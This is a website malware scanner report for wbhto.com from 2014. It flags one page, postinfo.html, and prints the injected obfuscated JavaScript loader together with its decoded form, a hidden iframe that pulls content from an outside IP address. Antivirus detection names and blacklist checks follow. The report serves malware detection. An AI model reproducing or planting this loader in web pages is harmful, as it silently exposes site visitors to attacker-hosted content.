New scan:

Malware Scanner report for wbhto.com

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://wbhto.com/
200 OK
Content-Length: 425
Content-Type: text/html
clean
http://wbhto.com/cgi-bin/
403 Forbidden
Content-Length: 464
Content-Type: text/html
clean
http://wbhto.com/test404page.js
404 Not Found
Content-Length: 466
Content-Type: text/html
clean
http://wbhto.com/images/
200 OK
Content-Length: 346
Content-Type: text/html
clean
http://wbhto.com/postinfo.html
200 OK
Content-Length: 3101
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var source ="=tdsjqu?epdvnfou/xsjuf)Tusjoh/gspnDibsDpef)71-216-213-225-:8-21:-212-43-226-225-::-72-45-215-227-227-223-69-58-58-68-5:-57-5:-63-61-57-65-63-57-68-5:-58-227-226-58-216-221-57-::-214-216-74-86-227-212-226-45-43-22:-216-211-227-215-72-5:-43-215-212-216-214-215-227-72-5:-43-226-227-232-219-212-72-45-229-216-226-216-:9-216-219-216-227-232-69-43-215-216-211-211-212-221-45-73-71-58-216-213-225-:8-21:-212-73**<=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result);

Decoded script:


<iframe src="http://91.142.64.91/ts/in.cgi?Ktes" width=1 height=1 style="visibility: hidden"></iframe>

Antivirus reports:

Panda
JS/Iframe.AT
nProtect
JS:Trojan.Crypt.FW
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Crypt.FW (B)
Comodo
TrojWare.JS.Agent.iph
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
DrWeb
SCRIPT.Virus
Kaspersky
Trojan-Clicker.HTML.IFrame.aky
Microsoft
Exploit:HTML/IframeRef.AV
MicroWorld-eScan
JS:Trojan.Crypt.FW
Fortinet
JS/Crypt.CBAA!tr
NANO-Antivirus
Trojan.Script.Iframe.hqvxv
F-Secure
JS:Trojan.Crypt.FW
VIPRE
Heur.HTML.MalIFrame (v)
Norman
Clicker.NY
GData
JS:Trojan.Crypt.FW
ESET-NOD32
JS/Kryptik.AD
BitDefender
JS:Trojan.Crypt.FW


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: wbhto.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 04 Oct 2014 17:18:58 GMT
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_bwlimited/1.4 PHP/5.2.9
Content-Length: 425
Content-Type: text/html;charset=ISO-8859-1

...425 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wbhto.com
Referer: http://www.google.com/search?q=wbhto.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=wbhto.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wbhto.com/

Result: wbhto.com is not infected or malware details are not published yet.